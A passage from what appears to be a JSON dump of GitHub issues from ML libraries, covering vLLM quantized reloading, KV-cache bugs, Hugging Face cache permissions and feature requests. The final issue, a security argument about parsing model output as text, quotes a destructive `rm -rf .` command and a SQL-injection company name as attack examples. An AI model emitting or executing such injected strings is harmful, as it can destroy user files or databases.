(such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nfrom transformers import AutoModel, AutoProcessor, AutoTokenizer\n\n### Expected behavior\n\nHow to fix?", "url": "https://github.com/huggingface/transformers/issues/42757", "state": "closed", "labels": [ "bug" ], "created_at": "2025-12-10T02:43:43Z", "updated_at": "2025-12-23T17:15:20Z", "comments": 0, "user": "dollarser" }, { "repo": "vllm-project/vllm", "number": 30359, "title": "[RFC] [QeRL]: Online Quantization and Model Reloading", "body": "### Motivation.\n\n## What is Quantized Model Reloading and Why is it Useful?\n\nvLLM serves not only as an inference runtime for serving requests from end users, but also as a means of serving requests for large language model post-training. One particularly important use case is using vLLM to serve rollouts (required by RL pipelines) with a quantized model. For more information, see [QeRL: Beyond Efficiency \u2013 Quantization-enhanced Reinforcement Learning for LLMs](https://arxiv.org/html/2510.11696v1).\n\nThese quantized models must be reloaded every couple of seconds in order to make sure that the rollouts match the distribution that would have been generated by the base model weights.\n\n## Existing Features in vLLM\n\nvLLM already has some pathways for enabling these kinds of workflows. However, the current implementations have caveats which can make usage difficult.\n\n### Weight Reloading\n\nAfter a model has been loaded once, the weights are stored in kernel format (see nomenclature). However, kernel format does not always match checkpoint format. There is an existing implementation which restores the original model format in order to allow reloading (implemented [here](https://github.com/vllm-project/vllm/blob/main/vllm/model_executor/model_loader/online_quantization.py)), but the \u201crestore\u201d step is done eagerly and effectively doubles the amount of required memory, which is not ideal. 
The current implementation has also only been enabled for torchao configs.\n\n### Online Quantization\n\nThere are two styles of online quantization implemented in vLLM. Originally, there was only the \u201coffline\u201d style of [FP8](https://github.com/vllm-project/vllm/blob/main/vllm/model_executor/layers/quantization/fp8.py#L222C14-L222C42), where all unquantized weights are loaded synchronously, and then all weights are quantized synchronously after loading via `process_weights_after_loading`. This style works, but requires as much memory as the unquantized model, despite the final model being quantized, which is not ideal (see the Memory Requirements section).\n\nRecently, @vkuzo implemented a means of online quantization by [adding a hook to the `weight_loader`](https://github.com/vllm-project/vllm/pull/29196/files) which calls `process_weights_after_loading` to quantize the weights as they are loading. This reduces the amount of memory that is required to online quantize models, but it has only been implemented for CT_FP8_CHANNELWISE and doesn't currently support post-processing operations which require multiple parameters, such as marlin repacking.\n\n## Design Considerations\n\n### Nomenclature\n\n- \u201cCheckpoint format\u201d refers to the format in which weights are loaded from disk or provided by a user.\n- \u201cModel format\u201d refers to the state of the model after `init` but before weights are processed with `process_weights_after_loading`. The mapping between \u201ccheckpoint format\u201d and \u201cmodel format\u201d is implemented by `model.load_weights`.\n- \u201cKernel format\u201d refers to the state of the model after `process_weights_after_loading`.\n- In the case where the checkpoint format is unquantized but the kernel format is quantized, we call this \u201conline quantization\u201d: unquantized weights are quantized by vLLM during/after loading.\n\n### Model Cuda Graph\n\nAfter a model is loaded for the first time, a CUDA graph of the model is captured and used to accelerate inference. This CUDA graph shares the same tensor data pointers as the model used to load weights. As of now, the data pointers used by the CUDA graph cannot be updated after capture. This means that any time reloading happens, the new data must be copied into the CUDA graph tensors.\n\nRegenerating the model CUDA graph is far too slow for the required cadence of model reloading (on the order of a few seconds).\n\n### Memory Requirements\n\nAn ideal solution would use as little memory as is required to load model weights. Some implementations, such as the current implementation of online quantization, require eagerly duplicating all model weights prior to loading, which effectively doubles the amount of memory required to load a model. This is a blocker for enabling reloading of large (600 GB+) models.\n\nAdditionally, an ideal solution would only use as much memory as is required to store the quantized model, not the unquantized model. In cases such as NVFP4, this would cut the memory requirements of vLLM reloading to one fourth.\n\n### Existing Quantized Reloading Scripts\n\nAlthough online quantization and quantized weight reloading support is limited in vLLM as of now, there are already users doing online quantized reloading with vLLM. Below is a list of examples.\n\n1. [MoonshotAI](https://github.com/MoonshotAI/checkpoint-engine/blob/44d5670b0e6aed5b9cd6c16e970c09f3dc888ad0/checkpoint_engine/worker.py#L167)\n2. 
[Verl](https://github.com/volcengine/verl/blob/f332fc814718b9ea7968f6d264211460d4e90fff/verl/utils/vllm/vllm_fp8_utils.py#L209)\n3. Periodic Labs, which calls `model.load_weights` with subsets ", "url": "https://github.com/vllm-project/vllm/issues/30359", "state": "open", "labels": [ "RFC" ], "created_at": "2025-12-09T21:24:20Z", "updated_at": "2025-12-19T18:19:22Z", "comments": 8, "user": "kylesayrs" }, { "repo": "vllm-project/vllm", "number": 30358, "title": "[Bug]: NIXL PD disaggregate with host_buffer has accuracy issue - Prefill scheduled num_block mismatch at update_state_after_alloc and request_finished", "body": "### Your current environment\n\nvllm-commit-id: 73a484caa1ad320d6e695f098c25c479a71e6774\n\nTested with A100\n\n### \ud83d\udc1b Describe the bug\n\nHow to reproduce\n```\nPREFILL_BLOCK_SIZE=16 DECODE_BLOCK_SIZE=16 bash tests/v1/kv_connector/nixl_integration/run_accuracy_test.sh --kv_buffer_device cpu\n```\n\naccuracy is ~0.3 much lower than expected 0.4 with Qwen0.6\n\n---\n\nWhat is the issue\n\nI found that the num_blocks sent to `update_state_after_alloc` and `request_finished` sometimes is not match. \n\n`update_state_after_alloc` => this function is scheduled by `scheduler.schedule` to update req_to_save and req_to_receive list, and block_ids passed by the method will indicate which blocks belong to one request.\n\n`request_finished` => this function is called also in `scheduler._connector_finished` to send completed request block_ids list to create a new metadata for decoder.\n\nHowever, based print logs, sometimes, block_ids in `scheduler.schedule` `update_state_after_alloc` is shorter than `scheduler._connector_finished` `request_finished` sometimes.\n\nExample as below\n\n```\n\n\ud83d\udcca Found 1320 unique Request IDs.\n\nFINAL SUMMARY\n\u2705 Consistent Requests : 1085 => num_blocks are same at `update_state_after_alloc` and `request_finished` \n\u274c Mismatched Requests : 235 => num_blocks is less in `update_state_after_alloc` than `request_finished` \n```\n\n```\n================================================================================\n\ud83d\udd34 MISMATCH DETECTED: cmpl-25c7397c-5686-4b70-a569-29ef04c7b4f9-0\n First Block Count: 44\n Last Block Count : 71\n --- Raw Lines for Context ---\n \u001b[0;36m(EngineCore_DP0 pid=417455)\u001b[0;0m update_state_after_alloc req_id=\"request.request_id='cmpl-25c7397c-5686-4b70-a569-29ef04c7b4f9-0'\" num_tokens=1121 len(block_ids)=44 block_ids=[162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205]\n \u001b[0;36m(EngineCore_DP0 pid=417455)\u001b[0;0m request_finished: prepare meta for decode: request.request_id='cmpl-25c7397c-5686-4b70-a569-29ef04c7b4f9-0' request.num_tokens=1122 len(block_ids)=71 block_ids=[162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232]\n--------------------------------------------------------------------------------\n\ud83d\udd34 MISMATCH DETECTED: cmpl-d77aa1e2-a55a-4a7e-8435-f3bfaaf7c7ed-0\n First Block Count: 26\n Last Block Count : 84\n --- Raw Lines for Context ---\n \u001b[0;36m(EngineCore_DP0 pid=417455)\u001b[0;0m 
update_state_after_alloc req_id=\"request.request_id='cmpl-d77aa1e2-a55a-4a7e-8435-f3bfaaf7c7ed-0'\" num_tokens=1331 len(block_ids)=26 block_ids=[310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, 335]\n \u001b[0;36m(EngineCore_DP0 pid=417455)\u001b[0;0m request_finished: prepare meta for decode: request.request_id='cmpl-d77aa1e2-a55a-4a7e-8435-f3bfaaf7c7ed-0' request.num_tokens=1332 len(block_ids)=84 block_ids=[310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 350, 351, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362, 363, 364, 365, 366, 367, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 378, 379, 380, 381, 382, 383, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393]\n--------------------------------------------------------------------------------\n\ud83d\udd34 MISMATCH DETECTED: cmpl-3ccca907-6af5-41fd-acdf-8a0bd0b48322-0\n First Block Count: 71\n Last Block Count : 82\n --- Raw Lines for Context ---\n \u001b[0;36m(EngineCore_DP0 pid=417455)\u001b[0;0m update_state_after_alloc req_id=\"request.request_id='cmpl-3ccca907-6af5-41fd-acdf-8a0bd0b48322-0'\" num_tokens=1307 len(block_ids)=71 block_ids=[394, 395, 396, 397, 398, 399, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410, 411, 412, 413, 414, 415, 416, 417, 418, 419, 420, 421, 422, 423, 424, 425, 426, 427, 428, 429, 430, 431, 432, 433, 434, 435, 436, 437, 438, 439, 440, 441, 442, 443, 444, 445, 446, 447, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 458, 459, 460, 461, 462, 463, 464]\n \u001b[0;36m(EngineCore_DP0 pid=417455)\u001b[0;0m request_finished: prepare meta for decode: request.request_id='cmpl-3ccca907-6af5-41fd-acdf-8a0bd0b48322-0' request.num_tokens=1308 len(block_ids)=82 block_ids=[394, 395, 396, 397, 398, 399, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410, 411, 412, 413, 414, 415, 416, 417, 418, 419, 420, 421, 422, 423, 424, 425, 426, 427, 428, 429, 430, 431, 432, 433, 434, 435, 436, 437, 438, 439, 440, 441, 442, 443, 444, 445, 446, 447, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457,", "url": "https://github.com/vllm-project/vllm/issues/30358", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-09T20:15:48Z", "updated_at": "2025-12-10T17:07:38Z", "comments": 3, "user": "xuechendi" }, { "repo": "huggingface/datasets", "number": 7900, "title": "`Permission denied` when sharing cache between users", "body": "### Describe the bug\n\nWe want to use `datasets` and `transformers` on a shared machine. Right now, each user has a separate HF_HOME in their home directory. To reduce duplicates of the datasets, we want to share that cache. While experimenting, we are running into `Permission denied` errors.\n\nIt looks like this was supported in the past (see #6589)?\n\nIs there a correct way to share caches across users?\n\n### Steps to reproduce the bug\n\n1. Create a directory `/models/hf_hub_shared_experiment` with read/write permissions for two different users\n2. 
For each user run the script below\n\n```python\nimport os\n\nos.environ[\"HF_HOME\"] = \"/models/hf_hub_shared_experiment\"\nos.environ[\"HF_DATASETS_CACHE\"] = \"/models/hf_hub_shared_experiment/data\"\n\nimport datasets\nimport transformers\n\nDATASET = \"tatsu-lab/alpaca\"\nMODEL = \"meta-llama/Llama-3.2-1B-Instruct\"\n\nmodel = transformers.AutoModelForCausalLM.from_pretrained(MODEL)\ntokenizer = transformers.AutoTokenizer.from_pretrained(MODEL)\ndataset = datasets.load_dataset(DATASET)\n```\n\nThe first user is able to download and use the model and dataset. The second user gets these errors:\n\n```\n$ python ./experiment_with_shared.py\nCould not cache non-existence of file. Will ignore error and continue. Error: [Errno 13] Permission denied: '/models/hf_hub_shared_experiment/hub/models--meta-llama--Llama-3.2-1B-Instruct/.no_exist/9213176726f574b556790deb65791e0c5aa438b6/custom_generate/generate.py'\nCould not cache non-existence of file. Will ignore error and continue. Error: [Errno 13] Permission denied: '/models/hf_hub_shared_experiment/hub/datasets--tatsu-lab--alpaca/.no_exist/dce01c9b08f87459cf36a430d809084718273017/alpaca.py'\nCould not cache non-existence of file. Will ignore error and continue. Error: [Errno 13] Permission denied: '/models/hf_hub_shared_experiment/hub/datasets--tatsu-lab--alpaca/.no_exist/dce01c9b08f87459cf36a430d809084718273017/.huggingface.yaml'\nCould not cache non-existence of file. Will ignore error and continue. Error: [Errno 13] Permission denied: '/models/hf_hub_shared_experiment/hub/datasets--tatsu-lab--alpaca/.no_exist/dce01c9b08f87459cf36a430d809084718273017/dataset_infos.json'\nTraceback (most recent call last):\n File \"/home/user2/.venv/experiment_with_shared.py\", line 17, in \n dataset = datasets.load_dataset(DATASET)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user2/.venv/lib/python3.12/site-packages/datasets/load.py\", line 1397, in load_dataset\n builder_instance = load_dataset_builder(\n ^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user2/.venv/lib/python3.12/site-packages/datasets/load.py\", line 1171, in load_dataset_builder\n builder_instance: DatasetBuilder = builder_cls(\n ^^^^^^^^^^^^\n File \"/home/user2/.venv/lib/python3.12/site-packages/datasets/builder.py\", line 390, in __init__\n with FileLock(lock_path):\n File \"/home/user2/.venv/lib/python3.12/site-packages/filelock/_api.py\", line 377, in __enter__\n self.acquire()\n File \"/home/user2/.venv/lib/python3.12/site-packages/filelock/_api.py\", line 333, in acquire\n self._acquire()\n File \"/home/user2/.venv/lib/python3.12/site-packages/filelock/_unix.py\", line 45, in _acquire\n fd = os.open(self.lock_file, open_flags, self._context.mode)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nPermissionError: [Errno 13] Permission denied: '/models/hf_hub_shared_experiment/data/_models_hf_hub_shared_experiment_data_tatsu-lab___alpaca_default_0.0.0_dce01c9b08f87459cf36a430d809084718273017.lock'\n```\n\n### Expected behavior\n\nThe second user should be able to read the shared cache files.\n\n### Environment info\n\n$ datasets-cli env\n\n- `datasets` version: 4.4.1\n- Platform: Linux-6.8.0-88-generic-x86_64-with-glibc2.39\n- Python version: 3.12.3\n- `huggingface_hub` version: 0.36.0\n- PyArrow version: 22.0.0\n- Pandas version: 2.3.3\n- `fsspec` version: 2025.10.0", "url": "https://github.com/huggingface/datasets/issues/7900", "state": "open", "labels": [], "created_at": "2025-12-09T16:41:47Z", "updated_at": "2025-12-16T15:39:06Z", "comments": 2, "user": "qthequartermasterman" 
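A workaround sketch for the shared-cache setup described above (an assumption based on general POSIX permission behavior, not an official `datasets` recommendation): relax the umask before the HF libraries create any files, so new cache entries and lock files stay group-writable.

```python
# Workaround sketch: make every file the HF libraries create group-writable.
# Assumes both users belong to a common group that owns the shared directory,
# e.g. prepared once with:
#   chgrp -R <group> /models/hf_hub_shared_experiment
#   chmod -R g+rwX /models/hf_hub_shared_experiment
import os

os.umask(0o002)  # new files: read/write for owner and group

os.environ["HF_HOME"] = "/models/hf_hub_shared_experiment"
os.environ["HF_DATASETS_CACHE"] = "/models/hf_hub_shared_experiment/data"

import datasets  # imported after the umask change so lock files inherit it
import transformers
```

Files already created with owner-only modes would still need a one-time `chmod` by the user who owns them.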
}, { "repo": "sgl-project/sglang", "number": 14746, "title": "Cannot join SGL slack Channel", "body": "same issue with [#3929](https://github.com/sgl-project/sglang/issues/3929) and [#11983](https://github.com/sgl-project/sglang/issues/11983)\n\nCan we get a new invitation link? Thanks a lot!", "url": "https://github.com/sgl-project/sglang/issues/14746", "state": "closed", "labels": [], "created_at": "2025-12-09T15:43:51Z", "updated_at": "2025-12-10T08:33:01Z", "comments": 2, "user": "alphabetc1" }, { "repo": "huggingface/transformers", "number": 42740, "title": "how to train trocr with transformers 4.57+?", "body": "i train trocr with tranfomers 4.15, the results is right,but train with 4.57.1,the acc is always 0 , i did't find the reason,did t can train succ with latest transofrmers?", "url": "https://github.com/huggingface/transformers/issues/42740", "state": "open", "labels": [], "created_at": "2025-12-09T14:07:50Z", "updated_at": "2026-01-05T06:46:34Z", "user": "cqray1990" }, { "repo": "huggingface/transformers", "number": 42739, "title": "How about adding local kernel loading to `transformers.KernelConfig()`", "body": "### Feature request\n\nAs title.\n\n### Motivation\n\nCurrently, the class `KernelConfig()` creates the `kernel_mapping` through the `LayerRepository` provided by `huggingface/kernels`. The `LayerRepository` downloads and loads kernel from the hub. I think adding the ability for it to load kernel locally should be very helpful for the debugging process.\n\n### Your contribution\n\n`huggingface/kernels` already has `LocalLayerRepository` built in. Maybe we should consider adding it to `KernelConfig()`.", "url": "https://github.com/huggingface/transformers/issues/42739", "state": "closed", "labels": [ "Feature request" ], "created_at": "2025-12-09T12:22:41Z", "updated_at": "2025-12-17T01:21:57Z", "user": "zheliuyu" }, { "repo": "huggingface/peft", "number": 2945, "title": "Return base model state_dict with original keys", "body": "### Feature request\n\nTL;DR: `from peft import get_base_model_state_dict`\n\nHi!\n\nI'm looking for a way to get the state dict of the base model after it has been wrapped in a `PeftModel` while preserving the original model's state dict keys. To the best of my knowledge, the only way this can be done right now is getting the state dict from `peft_model.base_model.model` and manually patching the keys by removing the `.base_layer.` infix and filtering our peft param keys.\n\nA reason you wouldn't want to load the base model's state dict before wrapping it, for example, is when you are loading state dicts after FSDP wrapping your peft model.\n\n### Your contribution\n\nI have some of this logic implemented for Torchtitan. I could repurpose some of it for a PR that handles PEFT's edge-cases a bit more gracefully (so far I've only checked my approach for LoRA).", "url": "https://github.com/huggingface/peft/issues/2945", "state": "open", "labels": [], "created_at": "2025-12-09T11:23:52Z", "updated_at": "2025-12-09T17:06:13Z", "comments": 6, "user": "dvmazur" }, { "repo": "vllm-project/vllm", "number": 30325, "title": "[Performance]: Can we enable triton_kernels on sm120", "body": "### Proposal to improve performance\n\nSince PR (https://github.com/triton-lang/triton/pull/8498) had been merged, we may enable triton_kernels on sm120. 
\nhttps://github.com/vllm-project/vllm/blob/67475a6e81abea915857f82e6f10d80b03b842c9/vllm/model_executor/layers/quantization/mxfp4.py#L153-L160\n\nAlthough I haven't looked at the relevant code in detail yet, I think it should be sufficient to complete the unit tests (or, if vLLM already has them and they are just skipped on sm120, deleting one line is enough) for all the kernels involved when triton_kernels is enabled, and run them on sm120.\n\n@zyongye Does this idea make sense?\n\n### Report of performance regression\n\n_No response_\n\n### Misc discussion on performance\n\n_No response_\n\n### Your current environment (if you think it is necessary)\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30325", "state": "open", "labels": [ "performance" ], "created_at": "2025-12-09T09:21:04Z", "updated_at": "2025-12-10T10:16:18Z", "comments": 2, "user": "ijpq" }, { "repo": "vllm-project/vllm", "number": 30296, "title": "[Usage]: Is it possible to configure P2P kv-cache in multi-machine and multi-gpu scenarios?", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 4.1.3\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu129\nIs debug build : False\nCUDA used to build PyTorch : 12.9\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.12 (main, Oct 10 2025, 08:52:57) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-5.15.0-126-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.9.86\nCUDA_MODULE_LOADING set to :\nGPU models and configuration :\nGPU 0: NVIDIA L20\nGPU 1: NVIDIA L20\nGPU 2: NVIDIA L20\nGPU 3: NVIDIA L20\nGPU 4: NVIDIA L20\nGPU 5: NVIDIA L20\nGPU 6: NVIDIA L20\nGPU 7: NVIDIA L20\n\nNvidia driver version : 550.90.07\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.5.2\n[pip3] numpy==2.2.0\n[pip3] nvidia-cublas-cu12==12.9.1.4\n[pip3] nvidia-cuda-cupti-cu12==12.9.79\n[pip3] nvidia-cuda-nvrtc-cu12==12.9.86\n[pip3] nvidia-cuda-runtime-cu12==12.9.79\n[pip3] nvidia-cudnn-cu12==9.10.2.21\n[pip3] nvidia-cudnn-frontend==1.16.0\n[pip3] nvidia-cufft-cu12==11.4.1.4\n[pip3] nvidia-cufile-cu12==1.14.1.1\n[pip3] nvidia-curand-cu12==10.3.10.19\n[pip3] nvidia-cusolver-cu12==11.7.5.82\n[pip3] nvidia-cusparse-cu12==12.5.10.65\n[pip3] nvidia-cusparselt-cu12==0.7.1\n[pip3] nvidia-cutlass-dsl==4.2.1\n[pip3] nvidia-ml-py==13.580.82\n[pip3] nvidia-nccl-cu12==2.27.5\n[pip3] nvidia-nvjitlink-cu12==12.9.86\n[pip3] nvidia-nvshmem-cu12==3.3.20\n[pip3] nvidia-nvtx-cu12==12.9.79\n[pip3] pyzmq==27.1.0\n[pip3] torch==2.9.0+cu129\n[pip3] torchaudio==2.9.0+cu129\n[pip3] torchvision==0.24.0+cu129\n[pip3] transformers==4.57.1\n[pip3] triton==3.5.0\n[conda] Could not
collect\n\n==============================\n vLLM Info\n==============================\nROCM Version : Could not collect\nvLLM Version : 0.11.2\nvLLM Build Flags:\n CUDA Archs: Not Set; ROCm: Disabled\nGPU Topology:\n GPU0 GPU1 GPU2 GPU3 GPU4 GPU5 GPU6 GPU7 CPU Affinity NUMA Affinity GPU NUMA ID\nGPU0 X PIX PIX PIX SYS SYS SYS SYS 0-55,112-167 0 N/A\nGPU1 PIX X PIX PIX SYS SYS SYS SYS 0-55,112-167 0 N/A\nGPU2 PIX PIX X PIX SYS SYS SYS SYS 0-55,112-167 0 N/A\nGPU3 PIX PIX PIX X SYS SYS SYS SYS 0-55,112-167 0 N/A\nGPU4 SYS SYS SYS SYS X PIX PIX PIX 56-111,168-223 1 N/A\nGPU5 SYS SYS SYS SYS PIX X PIX PIX 56-111,168-223 1 N/A\nGPU6 SYS SYS SYS SYS PIX PIX X PIX 56-111,168-223 1 N/A\nGPU7 SYS SYS SYS SYS PIX PIX PIX X 56-111,168-223 1 N/A\n\n\n==============================\n Environment Variables\n==============================\nNVIDIA_VISIBLE_DEVICES=all\nNVIDIA_REQUIRE_CUDA=cuda>=12.9 brand=unknown,driver>=535,driver<536 brand=grid,driver>=535,driver<536 brand=tesla,driver>=535,driver<536 brand=nvidia,driver>=535,driver<536 brand=quadro,driver>=535,driver<536 brand=quadrortx,driver>=535,driver<536 brand=nvidiartx,driver>=535,driver<536 brand=vapps,driver>=535,driver<536 brand=vpc,driver>=535,driver<536 brand=vcs,driver>=535,driver<536 brand=vws,driver>=535,driver<536 brand=cloudgaming,driver>=535,driver<536 brand=unknown,driver>=550,driver<551 brand=grid,driver>=550,driver<551 brand=tesla,driver>=550,driver<551 brand=nvidia,driver>=550,driver<551 brand=quadro,driver>=550,driver<551 brand=quadrortx,driver>=550,driver<551 brand=nvidiartx,driver>=550,driver<551 brand=vapps,driver>=550,driver<551 brand=vpc,driver>=550,driver<551 brand=vcs,driver>=550,driver<551 brand=vws,driver>=550,driver<551 brand=cloudgaming,driver>=550,driver<551 brand=unknown,driver>=560,driver<561 brand=grid,driver>=560,driver<561 brand=tesla,driver>=560,driver<561 brand=nvidia,driver>=560,driver<561 brand=quadro,driver>=560,driver<561 brand=quadrortx,driver>=560,driver<561 brand=nvidiartx,driver>=560,driver<561 brand=vapps,driver>=560,driver<561 brand=vpc,driver>=560,driver<561 brand=vcs,driver>=560,driver<561 brand=vws,driver>=560,driver<561 brand=cloudgaming,driver>=560,driver<561 brand=unknown,driver>=", "url": "https://github.com/vllm-project/vllm/issues/30296", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-09T03:29:48Z", "updated_at": "2025-12-09T03:29:48Z", "comments": 0, "user": "lululu-1997" }, { "repo": "huggingface/trl", "number": 4641, "title": "Further improving `GRPOTrainer` doc to include Qwen SAPO in Loss Types", "body": "### Feature request\n\nHello,\n\nI'd like to further document the Qwen SAPO implementation from @pramodith , not in the `paper_index` (he already did a good job) but in the `loss-types` subsection of the `GRPOTrainer`: https://huggingface.co/docs/trl/main/en/grpo_trainer#loss-types.\n\nI'd like to add the formula, a short paragraph description similar to other losses presented, and maybe the figure below I made, inspired by the SAPO paper Fig.1, that highlights visually the differences in trust regions with other `loss_type` options available for GRPO (at least GRPO, DAPO and DR GRPO), which is the core difference.\n\n\"Image\"\n\n*Note:* *negative temp* $\\tau=1.5$ *is not a typo, it's to see the difference more clearly with positive temp (as the delta with 1.05 is too small)*\n\n### Motivation\n\nCompared to the available losses in the repo, I believe Qwen's SAPO difference is more pronounced. It's not just a matter on how to average like DAPO. 
Changing the PPO clip that almost everyone uses is worth, imo, being mentioned in the `loss-types` subsection.\n\nSince there may be people not necessarily familiar with some RL details using TRL, I thought covering SAPO could help people better grasp or visualize the difference in the trust region and gradient weights.\n\n### Your contribution\n\nI'd like to submit a PR if you think this is something useful for readers/users.", "url": "https://github.com/huggingface/trl/issues/4641", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u2728 enhancement", "\ud83c\udfcb GRPO" ], "created_at": "2025-12-08T20:06:59Z", "updated_at": "2025-12-12T17:28:06Z", "comments": 1, "user": "casinca" }, { "repo": "huggingface/transformers", "number": 42713, "title": "mulitmodal forward pass for ministral 3 family", "body": "### System Info\n\nhttps://github.com/huggingface/transformers/blob/main/src/transformers/models/ministral3/modeling_ministral3.py#L505\n\nIt seems that here we are using a generic class which takes only the input ids as input, ignoring the pixel values. When can we expect this to be implemented?\n\n\n\n### Who can help?\n\n@Cyrilvallez \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nPlease implement https://github.com/huggingface/transformers/blob/main/src/transformers/models/gemma3/modeling_gemma3.py#L1174 for the ministral family as well, with multimodal capabilities.\n\n### Expected behavior\n\nMultimodal capabilities are needed for finetuning ministral for sequence classification, like gemma 3 4b:\nhttps://github.com/huggingface/transformers/blob/main/src/transformers/models/gemma3/modeling_gemma3.py#L1174", "url": "https://github.com/huggingface/transformers/issues/42713", "state": "closed", "labels": [ "bug" ], "created_at": "2025-12-08T18:46:14Z", "updated_at": "2025-12-15T11:21:08Z", "comments": 4, "user": "rishavranaut" }, { "repo": "vllm-project/vllm", "number": 30271, "title": "[Usage]: Qwen 3 VL Embedding", "body": "### Your current environment\n\nHi, I would like to ask if there is a way to extract Qwen 3 VL multimodal embeddings, similar to Jina Embeddings V4, for retrieval purposes?\n\nI've tried to initialize the model this way but it doesn't work:\n```\nmodel = LLM(\n model=\"Qwen/Qwen3-VL-8B-Instruct\",\n task=\"embed\",\n trust_remote_code=True,\n)\n```\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30271", "state": "closed", "labels": [ "usage" ], "created_at": "2025-12-08T17:26:41Z", "updated_at": "2025-12-09T07:18:35Z", "comments": 2, "user": "MingFengC" }, { "repo": "huggingface/optimum", "number": 2390, "title": "Request for input shapes to be specified", "body": "### Feature request\n\nCurrently, optimum-cli does not provide a way to specify static input shapes; it defaults to dynamic shapes. Is there a way to make it possible to specify the input shape? 
If not, why do we not allow this?\n\nAn example would be:\n`optimum-cli export openvino --model microsoft/resnet-50 graph_convert` -> `optimum-cli export openvino --model microsoft/resnet-50 graph_convert --input [1, 3, 224, 224]`\n\n### Motivation\n\nSpecifying a static shape in OpenVINO IR is nice to have for the [Intel/Altera FPGA AI Suite](https://www.altera.com/products/development-tools/fpga-ai-suite) toolchain, which does not support dynamic input shapes in OpenVINO IR at the moment.\n\n### Your contribution\n\nYes, if possible or the green light is given that this is allowed. Some modifications to the optimum_cli.py file [here](https://github.com/huggingface/optimum/blob/0227a1ce9652b1b02da5a510bf513c585608f8c2/optimum/commands/optimum_cli.py#L179) would probably be needed.", "url": "https://github.com/huggingface/optimum/issues/2390", "state": "open", "labels": [], "created_at": "2025-12-08T15:24:04Z", "updated_at": "2025-12-20T19:38:02Z", "comments": 3, "user": "danielliuce" }, { "repo": "huggingface/transformers", "number": 42698, "title": "parse_response must not accept detokenized text", "body": "### System Info\n\nThe [parse_response](https://github.com/huggingface/transformers/blob/5ee9ffe386c5ecc77d8009ab648b8c4c109931ea/src/transformers/tokenization_utils_base.py#L3525) function must only accept raw tokens, never detokenized text. Parsing from text is a vulnerability and therefore must not be possible.\n\nOnce the model response is rendered to text, it is not possible to distinguish control tokens from their textual representations. At the very least this leads to inconvenience due to the inability to discuss with the model its own codebase: \"here is my code, what is the function calling format used by the model?\" In the worst case it can be used as part of an attack vector, e.g. registering a company that pops up in search results with an `rm -rf .` name, in the hope that the name will be returned by the model as-is. (E.g. in the UK there used to be [\"; DROP TABLE \"COMPANIES\";--LTD\"](https://find-and-update.company-information.service.gov.uk/company/10542519))\n\nAlso, accepting a text string facilitates relying on models only producing text, and when we get multimodal models we end up with no infrastructure for them, as everything is reduced to text.\n\nIt is important to design APIs in such a way that they are hard to use incorrectly. Passing text to `parse_response` is appealing and kind of the easiest way to use the API.\n\nI am publishing this as an open bug rather than a closed security issue because it is a widespread systematic problem that haunts many implementations. It is worth discussing it openly.\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nIf a model produces the following token sequences:\n\n`[\"\", 